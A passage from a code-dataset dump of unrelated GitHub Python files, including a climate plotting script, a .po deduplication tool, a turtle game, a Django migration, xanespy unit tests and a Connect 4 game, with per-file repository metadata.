list1.append(nw_data)\nplt.figure()\nplt.plot(lat_bins,list1)\nplt.xlabel('Latitude')\nplt.ylabel('Total Cloud Fraction')\nplt.title('Total Cloud Fraction vs Latitude')\nplt.grid(True)\n\n\n#plt.contourf(lon,lat,data_av)\n\n\n","repo_name":"tristanohanlon/climate-analysis","sub_path":"old_scripts/script_for_opening_modis_dev.py","file_name":"script_for_opening_modis_dev.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"26753119651","text":"import re\r\nf = open('School/Maturita/texty/13.txt','r').read()\r\narr = []\r\nfil = re.findall(r'[A-Za-z]+',f)\r\nfor word in fil:\r\n w = (word.lower())\r\n arr.append(w)\r\n\r\nstring = ''\r\n\r\nfor i in arr:\r\n string +=i\r\nprint(string)\r\nrere = re.findall(r'[a-z]',string)\r\nhelpiarr = []\r\ncnt = 0\r\nhelpi = []\r\nabeceda= ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\r\nfor iksde in range(len(abeceda)):\r\n j = abeceda[iksde]\r\n sree = (j+':'+str(rere.count(j)))\r\n helpi.append(sree)\r\nprint(helpi)\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"DestroTheCreator/Maturita","sub_path":"Maturita/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71347819741","text":"from setuptools import setup, Extension\nfrom codecs import open\n\ntry:\n from Cython.Distutils import build_ext\nexcept ImportError:\n use_cython = False\nelse:\n use_cython = True\n\nif use_cython:\n sourcefiles = ['pycspade/cspade.pyx']\nelse:\n sourcefiles = ['pycspade/cspade.cpp']\n\nother_files = ['csrc/{}'.format(x) for x in [\n 'Itemset.cc', 'Array.cc', 'ArrayT.cc', 'Eqclass.cc', 'Lists.cc', 'extl2.cc', 'partition.cc', 'maxgap.cc',\n 'calcdb.cc', 'makebin.cc', 'getconf.cc', 'exttpose.cc', 'utils.cc'\n]]\n\nsourcefiles += other_files\n\next_modules = [\n Extension('pycspade.cspade',\n sourcefiles,\n include_dirs=['csrc/'],\n language='c++',\n extra_compile_args=[\n '-std=c++11',\n '-Wno-sign-compare',\n '-Wno-incompatible-pointer-types',\n '-Wno-unused-variable',\n '-Wno-absolute-value',\n '-Wno-visibility',\n '-Wno-#warnings']\n )\n]\n\nsetup(\n name='pycspade',\n cmdclass={'build_ext': build_ext},\n ext_modules=ext_modules,\n license='MIT',\n packages=['pycspade'],\n version='0.3.2',\n author=['Mohammed J. Zaki', 'Yukio Fukuzawa'],\n description='C-SPADE Python Implementation',\n long_description=open('README.md').read(),\n url='https://github.com/fzyukio/pycspade',\n keywords=['cspade', 'c-spade', 'sequence mining'],\n install_requires=['Cython'],\n\n)\n","repo_name":"fzyukio/pycspade","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"33627339326","text":"import os\n\nos.system('clear')\n\nprint(\"You enter a dark room with two doors...Do you go through Door #1 or Door #2?\")\n\ndoor = input(\"> \")\n\nif door == \"1\":\n print(\"\"\"There is a giant bear here eating cheesecake. What do you do?\n1.) Take the cheesecake.\n2.) Scream at the bear.\"\"\")\n door1 = input(\"> \")\n\n if door1 == \"1\":\n print(\"The bear rips your intestines out and you die.\")\n elif door1 == \"2\":\n print(\"The bear screams back and you die.\")\n else:\n print(f\"You die because {door1} was dumb.\")\n\nelif door == \"2\":\n print(\"\"\"There is a deep sea of nothingness. What do you do?\n1.) Fire a magic missle into the void.\n2.) Jump into the black abyss and hope for the best.\"\"\")\n door2 = input(\"> \")\n\n if door2 == \"1\":\n print(\"The missle hits you and you die.\")\n elif door2 == \"2\":\n print(\"You fall int a hole and you die.\")\n else:\n print(f\"You die because {door2} was dumb.\")\n\nelse:\n print(f\"You die because {door} was not an option.\")\n\nprint(\"\\n\")","repo_name":"bmbell23/websites","sub_path":"html/Coding/Python/Courses/Learn_Python_the_Hard_Way/ex31.py","file_name":"ex31.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10172053864","text":"#!/usr/bin/python\n# -*- coding: iso-8859-1 -*-\n\n\n#Gets a .po file (of l10n gettex strings) and returns it without duplicates\n\n#getUniquePOstrings.py []\n\n\n\nimport re\nimport sys\n\n\nif len(sys.argv)<2 or len(sys.argv)>3:\n sys.stderr.write(\"Usage: getUniquePOstrings.py []\\n\")\n exit(1)\n\n\ninfilename=sys.argv[1]\noutfilename=\"\"\ntry:\n outfilename=sys.argv[2]\nexcept:\n pass\n\ntry:\n ifh=open(infilename,\"r\")\nexcept:\n sys.stderr.write(\"File: \"+infilename+\" not found.\\n\")\n exit(2)\n\n\ntry:\n inlines=ifh.readlines()\nexcept:\n sys.stderr.write(\"File: \"+infilename+\". Read error.\\n\")\n exit(3)\n \nifh.close()\n\nif len(inlines)<=0:\n sys.stderr.write(\"File: \"+infilename+\". Empty file.\\n\")\n exit(4)\n\n\n\n#print inlines\n\n\ndatablocks=[]\nblock=[]\n\ncount=0\nfor line in inlines:\n if count==0:\n block=[line]\n elif count==1:\n block.append(line)\n else: # count ==2\n block.append(line)\n datablocks.append(block)\n \n count=(count+1)%3\n \n \n#print datablocks\n\n\n\nif outfilename==\"\":\n ofh=sys.stdout\nelse:\n try:\n ofh=open(outfilename,\"w\")\n except:\n sys.stderr.write(\"File: \"+infilename+\" not found.\\n\")\n exit(2)\n \n \n \n\nlinesdict={}\n\nfor block in datablocks:\n\n try: #Si ya existe la línea en el dict, la ignora\n linesdict[block[1]]\n except: #si no existe,la escribe en el resultado y la marca en el dict\n for line in block:\n ofh.write(line);\n linesdict[block[1]]=True\n\n \n\n\n \n\nif outfilename!=\"\":\n ofh.close()\n\n#New translation:\n# ISO to UTF. ScriptFile.sh\n# bash --dump-po-strings ScriptFile.sh > DestFile.pot\n# getUniquePOstrings.py DestFile.pot TranslationsFile.po\n# Copy to its language directory and translate\n# msgfmt -o CompiledTranslFile.mo TranslationsFile.po \n\n\n\n#To update:\n# ISO to UTF. ScriptFile.sh\n# bash --dump-po-strings ScriptFile.sh > NewTranslationsFile.pot\n# getUniquePOstrings.py DestFile.pot TranslationsFile.pot\n# msgmerge --update --previous --no-wrap CurrentTranslationsFile.po NewTranslationsFile.pot\n# Copy to its language directory and translate new strings\n# msgfmt -o CompiledTranslFile.mo TranslationsFile.po \n\n\n\n\n# ISO to UTF:\n#iconv --from-code=ISO-8859-1 --to-code=UTF-8 inFile > aux\n#mv -f aux outFile\n\n#Poner esta cabecera, para que coja bien el charset\n'''\n# Trad File\n#\n#, fuzzy\nmsgid \"\"\nmsgstr \"\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: 8bit\\n\"\n'''\n","repo_name":"Servicio-Informatica-Comunicaciones-UZ/VEL","sub_path":"src/build/localization-tools/getUniquePOstrings.py","file_name":"getUniquePOstrings.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39217718972","text":"import turtle\r\nimport time\r\nfrom turtle import Screen\r\n\r\n# window\r\nwn = turtle.Screen()\r\nwn.title(\"Molluscophobia: How to Defeat the Immortal Snail\")\r\nwn.bgcolor(\"black\")\r\nwn.bgpic(\"background_resized.gif\")\r\nwn.setup(width=1500, height=700)\r\nwn.tracer()\r\n\r\n# pen settings\r\npen = turtle.Turtle()\r\npen.speed(0)\r\npen.hideturtle()\r\npen.penup()\r\npen.color(\"black\")\r\n\r\nrunning = False\r\n\r\n\r\ndef start_game():\r\n global running\r\n\r\n start_message.clear()\r\n running = True\r\n\r\n\r\nwhile not running:\r\n screen = Screen()\r\n start_message = turtle.Turtle()\r\n start_message.hideturtle()\r\n start_message.penup()\r\n start_message.sety(160)\r\n start_message.write(\"Press SPACE to start and jump\", align=\"center\", font=(\"Courier\", 20, \"bold\"))\r\n\r\n screen.onkeypress(start_game, 'space')\r\n screen.listen()\r\n\r\n# score\r\npen.goto(600, 170)\r\npen.write(\"0\", move=False, align=\"center\", font=(\"Courier\", 25, \"normal\"))\r\n\r\n# draw ground\r\nGROUND_LEVEL = -120\r\npen.penup()\r\npen.goto(-1000, GROUND_LEVEL)\r\npen.pendown()\r\npen.goto(1000, GROUND_LEVEL)\r\npen.penup()\r\n\r\n# draw snail\r\nsnail = turtle.Turtle()\r\nsnail.speed(0)\r\nsnail.penup()\r\nturtle.register_shape(\"snaill.gif\")\r\nsnail.shape(\"snaill.gif\")\r\nsnail.goto(-580, GROUND_LEVEL + 50)\r\nsnail.dx = 0\r\nsnail.dy = 1\r\n\r\n# draw pipe\r\npipe = turtle.Turtle()\r\npipe.speed(0)\r\npipe.penup()\r\nturtle.register_shape(\"coinss.gif\")\r\npipe.shape(\"coinss.gif\")\r\npipe.goto(0, GROUND_LEVEL + 30)\r\npipe.dx = -15\r\npipe.dy = 0\r\n\r\n# draw goal\r\ngoal = turtle.Turtle()\r\ngoal.speed(0)\r\ngoal.penup()\r\nturtle.register_shape(\"pooo.gif\")\r\ngoal.shape(\"pooo.gif\")\r\ngoal.goto(500, GROUND_LEVEL + 100)\r\ngoal.dx = -15\r\ngoal.dy = 0\r\n\r\n# draw player\r\nplayer = turtle.Turtle()\r\nplayer.speed(0)\r\nplayer.penup()\r\nturtle.register_shape(\"huuman.gif\")\r\nplayer.shape(\"huuman.gif\")\r\nplayer.goto(-400, GROUND_LEVEL + 50)\r\nplayer.dx = 0\r\nplayer.dy = 1\r\n\r\n\r\n# Initialize game variables\r\nplayer.score = 0\r\n\r\ndef hide_all():\r\n pen.clear()\r\n pen.hideturtle()\r\n player.hideturtle()\r\n pipe.hideturtle()\r\n goal.hideturtle()\r\n snail.hideturtle()\r\n start_message.hideturtle()\r\n\r\nwhile running:\r\n # Update the screen\r\n\r\n pen.clear()\r\n start_message.clear()\r\n wn.update()\r\n\r\n # Add gravity\r\n gravity = -0.9\r\n player.dy += gravity\r\n\r\n # Move player\r\n y = player.ycor()\r\n y += player.dy\r\n player.sety(y)\r\n\r\n if GROUND_LEVEL - 10 < player.ycor() < GROUND_LEVEL + 60:\r\n def go_up():\r\n player.dy += 20\r\n if player.dy > 20:\r\n player.dy = 20\r\n\r\n\r\n # Keyboard binding\r\n wn.listen()\r\n wn.onkeypress(go_up, \"space\")\r\n\r\n # Bottom Border\r\n if player.ycor() < GROUND_LEVEL + 50:\r\n player.dy = 0\r\n player.sety(GROUND_LEVEL + 50)\r\n\r\n # Top Border\r\n if player.ycor() > GROUND_LEVEL + 200:\r\n player.dy = 0\r\n player.sety(GROUND_LEVEL + 200)\r\n\r\n # Move Pipe 1\r\n x = pipe.xcor()\r\n x += pipe.dx\r\n pipe.setx(x)\r\n\r\n # Move goal\r\n x = goal.xcor()\r\n x += goal.dx\r\n goal.setx(x)\r\n\r\n # Check for score\r\n player.score += 1\r\n pen.clear()\r\n pen.goto(600, 170)\r\n pen.write(player.score, move=False, align=\"center\", font=(\"Arial\", 25, \"normal\"))\r\n # high_score = player.score !!!\r\n\r\n # collision with pipe = game over\r\n if (abs(pipe.xcor() - player.xcor()) < 100) and (player.ycor() - pipe.ycor() < 100):\r\n 
time.sleep(0.2)\r\n hide_all()\r\n wn.bgpic(\"scarysnail.png\")\r\n pen.penup()\r\n pen.goto(0, 0)\r\n #highscore pen.write(player.score, move=False, align=\"center\", font=(\"Arial\", 70, \"normal\")) !!!\r\n\r\n # collision with goal = win\r\n if (abs(goal.xcor() - player.xcor()) < 20) and (player.ycor() - goal.ycor() < 100):\r\n time.sleep(0.4)\r\n hide_all()\r\n start_message.hideturtle()\r\n wn.bgpic(\"amongus.png\")\r\n\r\nwn.mainloop()\r\n","repo_name":"chicken8848/ctd1d","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9412769085","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('geographies', '0001_initial'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('people', '0001_initial'),\n ('programs', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Language',\n fields=[\n ('time_created', models.DateTimeField(auto_now_add=True, null=True)),\n ('time_modified', models.DateTimeField(auto_now=True, null=True)),\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('old_coco_id', models.BigIntegerField(null=True, editable=False)),\n ('language_name', models.CharField(unique=b'True', max_length=100)),\n ('user_created', models.ForeignKey(related_name='videos_language_created', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ('user_modified', models.ForeignKey(related_name='videos_language_related_modified', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='NonNegotiable',\n fields=[\n ('time_created', models.DateTimeField(auto_now_add=True, null=True)),\n ('time_modified', models.DateTimeField(auto_now=True, null=True)),\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('non_negotiable', models.CharField(max_length=500)),\n ('chapter', models.CharField(max_length=500)),\n ('days_after_sowing', models.CharField(max_length=500)),\n ('physically_verifiable', models.BooleanField(default=False, db_index=True)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Topic',\n fields=[\n ('time_created', models.DateTimeField(auto_now_add=True, null=True)),\n ('time_modified', models.DateTimeField(auto_now=True, null=True)),\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('old_coco_id', models.BigIntegerField(null=True, editable=False)),\n ('topic_name', models.CharField(default=b'None', max_length=100)),\n ('user_created', models.ForeignKey(related_name='videos_topic_created', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ('user_modified', models.ForeignKey(related_name='videos_topic_related_modified', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Video',\n fields=[\n ('time_created', models.DateTimeField(auto_now_add=True, null=True)),\n ('time_modified', models.DateTimeField(auto_now=True, null=True)),\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('old_coco_id', models.BigIntegerField(null=True, editable=False)),\n ('title', models.CharField(max_length=200)),\n ('duration', models.TimeField(null=True, blank=True)),\n ('summary', models.TextField(blank=True)),\n ('women_featured', models.CharField(max_length=100, choices=[(b'Farming', b'Farming'), (b'Teaching', b'Teaching'), (b'Making Decisions', b'Making Decisions'), (b'Being Interviwed', b'Being Interviwed'), (b'Other Activities', b'Other Activities'), (b'Does not feature women', b'Does not feature women')])),\n ('approval_date', models.DateField(null=True, blank=True)),\n ('video_status', models.CharField(max_length=100, choices=[(b'Storyboard', b'Storyboard'), (b'Filming', b'Filming'), (b'Post Production', b'Post Production'), 
(b'Waiting for Approval', b'Waiting for Approval'), (b'Approved', b'Approved')])),\n ('youtubeid', models.CharField(max_length=20, blank=True)),\n ('language', models.ForeignKey(to='videos.Language')),\n ('other_persons_shown', models.ForeignKey(blank=True, to='people.Person', null=True)),\n ('partner', models.ForeignKey(verbose_name=b'Supply Partner', to='programs.Partner')),\n ('persons_shown', models.ManyToManyField(related_name='persons_shown', to='people.Person')),\n ('production_team', models.ManyToManyField(related_name='production_team', to='people.Animator')),\n ('topic', models.ForeignKey(related_name='topic', to='videos.Topic')),\n ('user_created', models.ForeignKey(related_name='videos_video_created', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ('user_modified', models.ForeignKey(related_name='videos_video_related_modified', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ('village', models.ForeignKey(to='geographies.Village')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='video',\n unique_together=set([('title', 'topic', 'village')]),\n ),\n migrations.AddField(\n model_name='nonnegotiable',\n name='topic',\n field=models.ForeignKey(to='videos.Topic'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='nonnegotiable',\n name='user_created',\n field=models.ForeignKey(related_name='videos_nonnegotiable_created', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='nonnegotiable',\n name='user_modified',\n field=models.ForeignKey(related_name='videos_nonnegotiable_related_modified', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"digitalgreenorg/dg_MQED","sub_path":"videos/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13131390118","text":"import pygame\nimport math\nfrom constants import *\n\n# This sprite class represents the ball\n\n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self, x, y):\n super(Ball, self).__init__()\n self.x = x\n self.y = y\n self.image = pygame.image.load(IMAGE_BALL).convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.centerx = self.x\n self.rect.centery = self.y\n self.velocity = BALL_INITIAL_VELOCITY\n self.direction = BALL_INITIAL_DIRECTION\n\n def bounce(self, difference):\n self.direction = (180 - self.direction - difference) % 360\n\n def move(self, delta_x, delta_y):\n self.x += delta_x\n self.y += delta_y\n # update image position\n self.rect.centerx = self.x\n self.rect.centery = self.y\n\n def update(self):\n\n # convert to use radians, requirement of cos, sin\n direction_radian = math.radians(self.direction)\n\n # update current position\n self.x += self.velocity * math.sin(direction_radian)\n self.y -= self.velocity * math.cos(direction_radian)\n\n # check for boundaries\n\n # top\n if self.y <= BALL_RADIUS:\n self.bounce(0)\n self.y = BALL_RADIUS\n\n # left\n if self.x <= BALL_RADIUS:\n self.bounce(180)\n self.x = BALL_RADIUS\n\n # right\n if self.x + BALL_RADIUS >= SCREEN_WIDTH:\n self.bounce(180)\n self.x = SCREEN_WIDTH - BALL_RADIUS\n\n # update image position\n self.rect.centerx = self.x\n self.rect.centery = self.y\n\n def draw(self, display):\n display.blit(self.image, self.rect.topleft)\n\n def getDamage(self):\n return BALL_DAMAGE\n","repo_name":"mshi/bricks","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"73712097179","text":"from unittest import TestCase, mock\nimport math\nimport sys\nimport os\nimport multiprocessing\nfrom time import sleep\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))\n\nimport numpy as np\n\nfrom xanespy.utilities import (Extent, xy_to_pixel, xycoord, Pixel,\n pixel_to_xy, get_component,\n broadcast_reverse, is_kernel, prog,\n nproc, mp_map)\n\n\ndef add_one(x):\n \"\"\"Simple function for testing multiprocessing.\"\"\"\n return x+1\n\n\nclass UtilitiesTest(TestCase):\n def test_nproc(self):\n cpu_count = multiprocessing.cpu_count()\n # Test if it handles a simple number\n processes = nproc(5)\n self.assertEqual(processes, 5)\n # Test if it handles all CPUs (default)\n processes = nproc(None)\n self.assertEqual(processes, cpu_count)\n # Test if it handles negative numbers\n processes = nproc(-1)\n self.assertEqual(processes, cpu_count-1)\n # Test if it handles excessively negative numbers\n processes = nproc(-cpu_count-1)\n self.assertEqual(processes, 1)\n \n def mp_map(self):\n func = add_one\n # Try it with one processes\n result = mp_map(func, (0, 1, 3), ncore=1)\n np.testing.assert_equal(result, (1, 2, 4))\n # Try it with multiple processes\n result = mp_map(func, (0, 1, 3), ncore=2)\n np.testing.assert_equal(result, (1, 2, 4))\n \n def test_broadcast_reverse(self):\n orig = np.zeros(shape=(7, 48))\n target_shape = (7, 48, 958, 432)\n response = broadcast_reverse(orig, shape=target_shape)\n self.assertEqual(response.shape, target_shape)\n \n def test_interpret_complex(self):\n j = complex(0, 1)\n cmplx = np.array([[0+1j, 1+2j],\n [2+3j, 3+4j]])\n # Check modulus\n result = get_component(cmplx, 'modulus')\n mod = np.array([[1, np.sqrt(5)],\n [np.sqrt(13), 5]])\n np.testing.assert_array_equal(result, mod)\n # Check phase\n result = get_component(cmplx, 'phase')\n phase = np.array([[math.atan2(1, 0), math.atan2(2, 1)],\n [math.atan2(3, 2), math.atan2(4, 3)]])\n np.testing.assert_array_equal(result, phase)\n # Check real component\n result = get_component(cmplx, 'real')\n real = np.array([[0, 1],\n [2, 3]])\n np.testing.assert_array_equal(result, real)\n # Check imaginary component\n result = get_component(cmplx, 'imag')\n imag = np.array([[1, 2],\n [3, 4]])\n np.testing.assert_array_equal(result, imag)\n # Check if real data works ok\n real = np.array([[0, 1],[1, 2]])\n np.testing.assert_array_equal(get_component(real, \"modulus\"), real)\n \n def test_xy_to_pixel(self):\n extent = Extent(\n left=-1000, right=-900,\n top=300, bottom=250\n )\n # Try an x-y value in the middle of a pixel\n result = xy_to_pixel(\n xy=xycoord(x=-975, y=272.5),\n extent=extent,\n shape=(10, 10)\n )\n self.assertEqual(result, Pixel(vertical=6, horizontal=2))\n # Try an x-y value right on the edge of a pixel\n result = xy_to_pixel(\n xy=xycoord(x=-950, y=250),\n extent=extent,\n shape=(10, 10)\n )\n self.assertEqual(result, Pixel(vertical=9, horizontal=5))\n # Try an x-y value at the edge of the image\n result = xy_to_pixel(\n xy=xycoord(x=-900, y=250),\n extent=extent,\n shape=(10, 10)\n )\n self.assertEqual(result, Pixel(vertical=9, horizontal=9))\n result = xy_to_pixel(\n xy=xycoord(x=-1000, y=300),\n extent=extent,\n shape=(10, 10)\n )\n self.assertEqual(result, Pixel(vertical=0, horizontal=0))\n \n def test_pixel_to_xy(self):\n extent = Extent(\n left=-1000, right=-900,\n top=300, bottom=250\n )\n result = pixel_to_xy(\n pixel=Pixel(vertical=9, horizontal=4),\n extent=extent,\n shape=(10, 10)\n )\n self.assertEqual(result, 
xycoord(x=-955., y=252.5))\n","repo_name":"canismarko/xanespy","sub_path":"tests/test_utilities.py","file_name":"test_utilities.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"32400540621","text":"#Reference:\r\n#https://www3.nd.edu/~pbui/teaching/cdt.30010.fa16/project01.html\r\n\r\n\r\nimport time\r\nimport pygame\r\nimport sys\r\nimport math\r\nimport random\r\nfrom AI import *\r\n\r\n\r\nclass Connect4Board:\r\n def __init__(self,rows=6, columns=7):\r\n ''' Creates empty Connect 4 board \r\n @param: rows. Number of rows for the board. Default = 6\r\n @param: columns. Number of columns for the board. Default = 7\r\n @return: None\r\n @raises: None\r\n\r\n '''\r\n self.board = []\r\n self.nrows = rows\r\n self.ncolumns = columns\r\n self.piece_one = 'x'\r\n self.piece_two = 'o'\r\n\r\n self.SQUARESIZE = 100 #parameters for the board\r\n self.COLUMN_COUNT = self.ncolumns\r\n self.ROW_COUNT = self.nrows\r\n self.width = self.COLUMN_COUNT * self.SQUARESIZE\r\n self.height = (self.ROW_COUNT+1) * self.SQUARESIZE\r\n self.size = (self.width,self.height)\r\n self.screen = pygame.display.set_mode(self.size)\r\n\r\n for row in range(rows):\r\n board_row = []\r\n for column in range(columns):\r\n board_row.append(' ')\r\n self.board.append(board_row)\r\n\r\n \r\n\r\n\r\n def print_board(self):\r\n ''' Prints Connect 4 board in nice format '''\r\n for row in self.board:\r\n print (\"|\" + \"|\" .join(row) + \"|\")\r\n\r\n\r\n def drop_piece(self,column, piece): \r\n ''' Attempts to drop specified piece into the board at the\r\n specified column. If this succeeds, return True. \r\n @param column: The column to insert on\r\n @param piece: The piece to be inserted\r\n @return: True if piece successfully dropped.\r\n @raises: Exception. When the column is fully occupied. \r\n '''\r\n \r\n try:\r\n for i in range(self.nrows-1,-1,-1):\r\n if self.board[i][column] == ' ':\r\n self.board[i][column] = piece\r\n return True\r\n \r\n raise Exception(\"Not a valid input for column: \" + str(column)) \r\n #When the column has already been fully occupied\r\n except IndexError:\r\n print('Not a valid column. Valid columns: 0 to ' + str(self.ncolumns-1))\r\n\r\n\r\n def has_winner(self,piece, n_seq = 4,): \r\n ''' Returns the position of first winning sequence encountered or False if none encountered in board\r\n @param board: The Connect 4 board instance\r\n @param n_seq: Number of pieces for winning sequence. Default = 4\r\n @return: Position of winning sequence or False if board does not have winning sequence.\r\n @raises: None \r\n '''\r\n found = False\r\n for row in range(self.nrows):\r\n for col in range(self.ncolumns):\r\n if self.board[row][col] == piece:\r\n \r\n retVal = self.check_piece(row,col,n_seq)\r\n if retVal != False:\r\n return True\r\n return found\r\n \r\n \r\n\r\n def check_piece(self,row,column,n_seq = 4):\r\n ''' Check whether there is a winning sequence of 4 pieces at position (row,column) in board\r\n @param row: index of row in the board\r\n @param column: index of column in the board\r\n @param n_seq: Number of pieces for winning sequence. Default = 4\r\n @return: (row,column) parameters if it is part of a 4 sequence or False otherwise\r\n @raises: None \r\n '''\r\n\r\n DIRECTIONS = (\r\n (-1, -1), (-1, 0), (-1, 1),\r\n ( 0, -1), ( 0, 1),\r\n ( 1, -1), ( 1, 0), ( 1, 1),\r\n )\r\n \r\n for dr, dc in DIRECTIONS:\r\n found_winner = True\r\n \r\n for i in range(1,n_seq):\r\n r = row + dr*i\r\n c = column + dc*i\r\n \r\n \r\n if r not in range(0,self.nrows) or c not in range(0,self.ncolumns): #check if within boundary of board. 
If not stop checking that direction and move on to next direction.\r\n found_winner = False\r\n break\r\n \r\n else: \r\n \r\n if self.board[r][c] != self.board[row][column]: #check if the current checked cell has same cell as original point\r\n found_winner = False\r\n break\r\n \r\n \r\n if found_winner == True:\r\n return (row,column)\r\n \r\n return False\r\n\r\n\r\n def get_winner(self,row,column):\r\n ''' Returns the winner (player1 or player2) who forms a 4 squence at position row,column in board\r\n @param row: index of row in the board\r\n @param column: index of column in the board\r\n @return: String: \"Player 1\" or \"Player 2\"\r\n @raises: Exception: if the position is empty. Used only for cases where called outside game loop. \r\n '''\r\n try:\r\n if self.board[row][column] == \"x\":\r\n return \"Player 1\"\r\n elif self.board[row][column] == \"o\":\r\n return \"Player 2\"\r\n else:\r\n raise Exception(\"Position at \" + str(row) + \",\" + str(column) + \" is empty.\" )\r\n\r\n except IndexError:\r\n print(\"get_winner called with wrong winning position\")\r\n\r\n\r\n \r\n def previous_row(self,column):\r\n ''' Returns the index of the row which is the highest (last played/last inserted) in a particular column\r\n @param column: index of column in the board\r\n @return: int: index of row. If column has no pieces return False\r\n @raises: Exception: if column outside of boundary of board\r\n '''\r\n if abs(column) >= self.ncolumns:\r\n raise Exception(\"Column does not exist in the board. Must be between 0 and \" + str(self.ncolumns-1))\r\n \r\n \r\n for i in range(0,self.nrows,1):\r\n if self.board[i][column] == self.piece_one or self.board[i][column] == self.piece_two:\r\n return i\r\n return False\r\n \r\n\r\n def draw_board(self):\r\n ''' Create a user interface of the connect 4 board\r\n @param None\r\n @return: None\r\n @raises: None\r\n '''\r\n for c in range(self.ncolumns):\r\n for r in range(self.nrows):\r\n pygame.draw.rect(self.screen, (0,0,255), (c*self.SQUARESIZE, r*self.SQUARESIZE + self.SQUARESIZE, self.SQUARESIZE, self.SQUARESIZE)) #draw rectangle\r\n\r\n if self.board[r][c] == ' ': #if position does not have any input, draw black circle\r\n pygame.draw.circle(self.screen, (0,0,0), (int(c*self.SQUARESIZE + self.SQUARESIZE/2), int(r*self.SQUARESIZE + self.SQUARESIZE + self.SQUARESIZE/2)), int(self.SQUARESIZE/2 - 5))\r\n elif self.board[r][c] == self.piece_one: #if contains player 1 input, draw red circle\r\n pygame.draw.circle(self.screen, (255,0,0), (int(c*self.SQUARESIZE + self.SQUARESIZE/2), int(r*self.SQUARESIZE + self.SQUARESIZE + self.SQUARESIZE/2)), int(self.SQUARESIZE/2 - 5))\r\n else: #if contains player 2 input, draw yellow circle\r\n pygame.draw.circle(self.screen, (255,255,0), (int(c*self.SQUARESIZE + self.SQUARESIZE/2), int(r*self.SQUARESIZE + self.SQUARESIZE + self.SQUARESIZE/2)), int(self.SQUARESIZE/2 - 5))\r\n pygame.display.update() #update to show changes\r\n\r\n\r\n\r\ndef main():\r\n board = Connect4Board(6,7)\r\n game_over = False\r\n \r\n #reference for GUI: https://www.youtube.com/watch?v=SDz3P_Ctm7U&t=7s\r\n pygame.init() \r\n board.draw_board() #draw the empty board based on the instance dimension\r\n pygame.display.update() #update based on draw_board function\r\n\r\n myfont = pygame.font.SysFont(\"monospace\", 75)\r\n #game loop\r\n board.print_board()\r\n\r\n #turn = random.randint(0,1)\r\n turn = 0\r\n while not game_over:\r\n\r\n \r\n \r\n for event in pygame.event.get(): #allow to quit by clicking exit button\r\n if event.type == 
